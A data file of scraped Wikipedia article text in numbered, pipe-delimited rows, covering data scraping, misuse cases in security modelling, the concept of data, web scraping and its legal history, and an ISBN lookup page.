(e.g., tmp). To prevent a malicious programmer from anticipating this common typing mistake: The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use. 30 31 |
370 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-9 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
371 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Misuse_case | Misuse case is a business process modeling tool used in the software development industry. The term Misuse Case or mis-use case is derived from and is the inverse of use case. 1 The term was first used in the 1990s by Guttorm Sindre of the Norwegian University of Science and Technology, and Andreas L. Opdahl of the University of Bergen, Norway. It describes the process of executing a malicious act against a system, while use case can be used to describe any action taken by the system. 2 Use cases specify required behaviour of software and other products under development, and are essentially structured stories or scenarios detailing the normal behavior and usage of the software. A Misuse Case on the other hand highlights something that should not happen (i.e. a Negative Scenario) and the threats hence identified, help in defining new requirements, which are expressed as new Use Cases. This modeling tool has several strengths: Its biggest weakness is its simplicity. It needs to be combined with more powerful tools to establish an adequate plan for the execution of a project. One other weakness is its lack of structure and semantics. In an industry it is important to describe a system's behavior when it responds to a request that originates from outside : the use cases 5 have become popular for requirements 1 between the engineers thanks to its features like the visual modeling technique, they describe a system from an actor's viewpoint and its format explicitly conveys each actor's goals and the flows the system must implement to accomplish them. 6 The level of abstraction of a use case model makes it an appropriate starting point for design activities, thanks to the use of UML use case diagrams and the end user's or domain expert's language. But for software security analyses, the developers should pay attention to negative scenarios and understand them. That is why, in the 1990s, the concept of "inverse of a use case" was born in Norway. The contrast between the misuse case and the use case is the goal: the misuse case describes potential system behaviors that a system's stakeholders consider unacceptable or, as Guttorm Sindre and Andreas L. Opdahl said, "a function that the system should not allow". 1 This difference is also in the scenarios: a "positive" scenario is a sequence of actions leading to a Goal desired by a person or organization, while a "negative" one is a scenario whose goal is desired not to occur by the organization in question or desired by a hostile agent (not necessarily human). 7 Another description of the difference is by 8 that defines a use case as a completed sequence of actions which gives increased value to the user, one could define a misuse case as a completed sequence of actions which results in loss for the organization or some specific stakeholder. Between the "good" and the "bad" case the language to represent the scenario is common: the use case diagrams are formally included in two modeling languages defined by the OMG: the Unified Modeling Language (UML) and the Systems Modeling Language (SysML), and this use of drawing the agents and misuse cases of the scenario explicitly helps focus attention on it. 9 Misuse case are most commonly used in the field of security. 10 With the ever-growing importance of IT system, it has become vital for every company to develop capability to protect its data. 11 Hence, for example a misuse case might be used to define what a hacker would want to do with the system and define his or her requirements. A developer or designer can then define the requirements of the user and the hacker in the same UML diagram which in turn helps identify the security risks of the system. 12 A misuse case diagram is created together with a corresponding use case diagram. The model introduces 2 new important entities (in addition to those from the traditional use case model, use case and actor: The misuse case model makes use of those relation types found in the use case model; include, extend, generalize and association. In addition, it introduces two new relations to be used in the diagram: These new concepts together with the existing ones from use case give the following meta model, which is also found as fig. 2 in Sindre and Opdahl (2004). 2 There are two different ways of describing a misuse case textual; one is embedded in a use case description template - where an extra description field called Threats can be added. This is the field where misuse case steps (and alternate steps) can be filled in. This is referred to as the lightweight mode of describing a misuse case. The other way of describing a misuse case, is by using a separate template for this purpose only. It is suggested to inherit some of the field from use case description (Name, Summary, Author and Date). It also adapts the fields Basic path and Alternative path, where they now describe the paths of the misuse cases instead of the use cases. In addition to there, it is proposed to use several other fields too: As one might understand, the list above is too comprehensive to be completely filled out every time. Not all the fields are required to be filled in at the beginning, and it should thus be viewed as a living document. There has also been some debating whether to start with diagrams or to start with descriptions. The recommendation given by Sindre and Opdahl on that matter is that it should be done as with use cases. Sindre and Opdahl proposes the following 5 steps for using misuse cases to identify security requirements: It is suggested to use a repository of reusable misuse cases as a support in this 5 step process. Current research on misuse cases are primarily focused on the security improvements they can bring to a project, software projects in particular. Ways to increase the widespread adoption of the practice of misuse case development during earlier phases of application development are being considered: the sooner a flaw is found, the easier it is to find a patch and the lower the impact is on the final cost of the project. Other research focuses on improving the misuse case to achieve its final goal: for 13 "there is a lack on the application process, and the results are too general and can cause a under-definition or misinterpretation of their concepts". They suggest furthermore "to see the misuse case in the light of a reference model for information system security risk management (ISSRM) to obtain a security risk management process. The misuse cases are well known by the population of researchers. The body of research on the subject demonstrate the knowledge, but beyond the academic world, the misuse case has not been broadly adopted. As Sindre and Opdahl (the parents of the misuse case concept) suggest: "Another important goal for further work is to facilitate broader industrial adoption of misuse cases". 2 They propose, in the same article, to embed the misuse case in a usecase modeling tool and to create a "database" of standard misuse cases to assist software architects. System stakeholders should create their own misuse case charts for requirements that are specific to their own problem domains. Once developed, a knowledge database can reduce the amount of standard security flaws used by lambda hackers. Other research focused on possible missing concrete solutions of the misuse case: as 14 wrote "While this approach can help in a high level elicitation of security requirements, it does not show how to associate the misuse cases to legitimate behavior and concrete assets; therefore, it is not clear what misuse case should be considered, nor in what context". These criticisms might be addressed with the suggestions and improvements presented in the precedent section. Standardization of the misuse case as part of the UML notation might allow it to become a mandatory part of project development. "It might be useful to create a specific notation for security functionality, or countermeasures that have been added to mitigate vulnerabilities and threats. 15 |
372 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data | In common usage, data ( de t , also US: d t ) is a collection of discrete or continuous values that convey information, describing the quantity, quality, fact, statistics, other basic units of meaning, or simply sequences of symbols that may be further interpreted formally. A datum is an individual value in a collection of data. Data are usually organized into structures such as tables that provide additional context and meaning, and may themselves be used as data in larger structures. Data may be used as variables in a computational process. 1 2 Data may represent abstract ideas or concrete measurements. 3 Data are commonly used in scientific research, economics, and virtually every other form of human organizational activity. Examples of data sets include price indices (such as the consumer price index), unemployment rates, literacy rates, and census data. In this context, data represent the raw facts and figures from which useful information can be extracted. Data are collected using techniques such as measurement, observation, query, or analysis, and are typically represented as numbers or characters that may be further processed. Field data are data that are collected in an uncontrolled, in-situ environment. Experimental data are data that are generated in the course of a controlled scientific experiment. Data are analyzed using techniques such as calculation, reasoning, discussion, presentation, visualization, or other forms of post-analysis. Prior to analysis, raw data (or unprocessed data) is typically cleaned: Outliers are removed, and obvious instrument or data entry errors are corrected. Data can be seen as the smallest units of factual information that can be used as a basis for calculation, reasoning, or discussion. Data can range from abstract ideas to concrete measurements, including, but not limited to, statistics. Thematically connected data presented in some relevant context can be viewed as information. Contextually connected pieces of information can then be described as data insights or intelligence. The stock of insights and intelligence that accumulate over time resulting from the synthesis of data into information, can then be described as knowledge. Data has been described as "the new oil of the digital economy". 4 5 Data, as a general concept, refers to the fact that some existing information or knowledge is represented or coded in some form suitable for better usage or processing. Advances in computing technologies have led to the advent of big data, which usually refers to very large quantities of data, usually at the petabyte scale. Using traditional data analysis methods and computing, working with such large (and growing) datasets is difficult, even impossible. (Theoretically speaking, infinite data would yield infinite information, which would render extracting insights or intelligence impossible.) In response, the relatively new field of data science uses machine learning (and other artificial intelligence (AI)) methods that allow for efficient applications of analytic methods to big data. The Latin word data is the plural of datum, (thing) given, and the neuter past participle of dare, "to give". 6 The first English use of the word "data" is from the 1640s. The word "data" was first used to mean "transmissible and storable computer information" in 1946. The expression "data processing" was first used in 1954. 6 When "data" is used more generally as a synonym for "information", it is treated as a mass noun in singular form. This usage is common in everyday language and in technical and scientific fields such as software development and computer science. One example of this usage is the term "big data". When used more specifically to refer to the processing and analysis of sets of data, the term retains its plural form. This usage is common in the natural sciences, life sciences, social sciences, software development and computer science, and grew in popularity in the 20th and 21st centuries. Some style guides do not recognize the different meanings of the term and simply recommend the form that best suits the target audience of the guide. For example, APA style as of the 7th edition requires "data" to be treated as a plural form. 7 Data, information, knowledge, and wisdom are closely related concepts, but each has its role concerning the other, and each term has its meaning. According to a common view, data is collected and analyzed; data only becomes information suitable for making decisions once it has been analyzed in some fashion. 8 One can say that the extent to which a set of data is informative to someone depends on the extent to which it is unexpected by that person. The amount of information contained in a data stream may be characterized by its Shannon entropy. Knowledge is the awareness of its environment that some entity possesses, whereas data merely communicates that knowledge. For example, the entry in a database specifying the height of Mount Everest is a datum that communicates a precisely-measured value. This measurement may be included in a book along with other data on Mount Everest to describe the mountain in a manner useful for those who wish to decide on the best method to climb it. Awareness of the characteristics represented by this data is knowledge. Data are often assumed to be the least abstract concept, information the next least, and knowledge the most abstract. 9 In this view, data becomes information by interpretation; e.g., the height of Mount Everest is generally considered "data", a book on Mount Everest geological characteristics may be considered "information", and a climber's guidebook containing practical information on the best way to reach Mount Everest's peak may be considered "knowledge". "Information" bears a diversity of meanings that range from everyday usage to technical use. This view, however, has also been argued to reverse how data emerges from information, and information from knowledge. 10 Generally speaking, the concept of information is closely related to notions of constraint, communication, control, data, form, instruction, knowledge, meaning, mental stimulus, pattern, perception, and representation. Beynon-Davies uses the concept of a sign to differentiate between data and information; data is a series of symbols, while information occurs when the symbols are used to refer to something. 11 12 Before the development of computing devices and machines, people had to manually collect data and impose patterns on it. With the development of computing devices and machines, these devices can also collect data. In the 2010s, computers were widely used in many fields to collect data and sort or process it, in disciplines ranging from marketing, analysis of social service usage by citizens to scientific research. These patterns in the data are seen as information that can be used to enhance knowledge. These patterns may be interpreted as "truth" (though "truth" can be a subjective concept) and may be authorized as aesthetic and ethical criteria in some disciplines or cultures. Events that leave behind perceivable physical or virtual remains can be traced back through data. Marks are no longer considered data once the link between the mark and observation is broken. 13 Mechanical computing devices are classified according to how they represent data. An analog computer represents a datum as a voltage, distance, position, or other physical quantity. A digital computer represents a piece of data as a sequence of symbols drawn from a fixed alphabet. The most common digital computers use a binary alphabet, that is, an alphabet of two characters typically denoted "0" and "1". More familiar representations, such as numbers or letters, are then constructed from the binary alphabet. Some special forms of data are distinguished. A computer program is a collection of data, that can be interpreted as instructions. Most computer languages make a distinction between programs and the other data on which programs operate, but in some languages, notably Lisp and similar languages, programs are essentially indistinguishable from other data. It is also useful to distinguish metadata, that is, a description of other data. A similar yet earlier term for metadata is "ancillary data. The prototypical example of metadata is the library catalog, which is a description of the contents of books. Whenever data needs to be registered, data exists in the form of a data document. Kinds of data documents include: Some of these data documents (data repositories, data studies, data sets, and software) are indexed in Data Citation Indexes, while data papers are indexed in traditional bibliographic databases, e.g., Science Citation Index. Gathering data can be accomplished through a primary source (the researcher is the first person to obtain the data) or a secondary source (the researcher obtains the data that has already been collected by other sources, such as data disseminated in a scientific journal). Data analysis methodologies vary and include data triangulation and data percolation. 14 The latter offers an articulate method of collecting, classifying, and analyzing data using five possible angles of analysis (at least three) to maximize the research's objectivity and permit an understanding of the phenomena under investigation as complete as possible: qualitative and quantitative methods, literature reviews (including scholarly articles), interviews with experts, and computer simulation. The data is thereafter "percolated" using a series of pre-determined steps so as to extract the most relevant information. An important field in computer science, technology, and library science is the longevity of data. Scientific research generates huge amounts of data, especially in genomics and astronomy, but also in the medical sciences, e.g. in medical imaging. In the past, scientific data has been published in papers and books, stored in libraries, but more recently practically all data is stored on hard drives or optical discs. However, in contrast to paper, these storage devices may become unreadable after a few decades. Scientific publishers and libraries have been struggling with this problem for a few decades, and there is still no satisfactory solution for the long-term storage of data over centuries or even for eternity. Data accessibility. Another problem is that much scientific data is never published or deposited in data repositories such as databases. In a recent survey, data was requested from 516 studies that were published between 2 and 22 years earlier, but less than one out of five of these studies were able or willing to provide the requested data. Overall, the likelihood of retrieving data dropped by 17% each year after publication. 15 Similarly, a survey of 100 datasets in Dryad found that more than half lacked the details to reproduce the research results from these studies. 16 This shows the dire situation of access to scientific data that is not published or does not have enough details to be reproduced. A solution to the problem of reproducibility is the attempt to require FAIR data, that is, data that is Findable, Accessible, Interoperable, and Reusable. Data that fulfills these requirements can be used in subsequent research and thus advances science and technology. 17 Although data is also increasingly used in other fields, it has been suggested that the highly interpretive nature of them might be at odds with the ethos of data as "given". Peter Checkland introduced the term capta (from the Latin capere, "to take") to distinguish between an immense number of possible data and a sub-set of them, to which attention is oriented. 18 Johanna Drucker has argued that since the humanities affirm knowledge production as "situated, partial, and constitutive, using data may introduce assumptions that are counterproductive, for example that phenomena are discrete or are observer-independent. 19 The term capta, which emphasizes the act of observation as constitutive, is offered as an alternative to data for visual representations in the humanities. The term data-driven is a neologism applied to an activity which is primarily compelled by data over all other factors. citation needed Data-driven applications include data-driven programming and data-driven journalism. |
373 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-9 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
374 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:BookSources/0-596-00577-6 | This page allows users to search multiple sources for a book given a 10 or 13 digit International Standard Book Number. Spaces and dashes in the ISBN do not matter. This page links to catalogs of libraries, booksellers, and other book sources where you will be able to search for the book by its International Standard Book Number (ISBN). Google Books and Amazon.com may be helpful if you want to verify citations in Wikipedia articles, because they often let you search an online version of the book for specific words or phrases, or you can browse through the book (although for copyright reasons the entire book is usually not available). At the Open Library (part of the Internet Archive) you can borrow and read entire books online. Alabama California Colorado Connecticut Delaware Florida Georgia Illinois Indiana Iowa Kansas Kentucky Massachusetts Michigan Minnesota Missouri Nebraska New Jersey New Mexico New York North Carolina Ohio Oklahoma Oregon Pennsylvania Rhode Island South Carolina South Dakota Tennessee Texas Utah Washington state Wisconsin Find your book on a site that compiles results from other online sites: These sites allow you to search the catalogs of many individual booksellers: If the book you are looking for is in a language other than English, you might find it helpful to look at the equivalent pages on other Wikipedias, linked below they are more likely to have sources appropriate for that language. The WorldCat xISBN tool for finding other editions is no longer available. However, there is often a "view all editions" link on the results page from an ISBN search. Google books often lists other editions of a book and related books under the "about this book" link. You can convert between 10 and 13 digit ISBNs with these tools: Get free access to research Research tools and services Outreach Get involved |
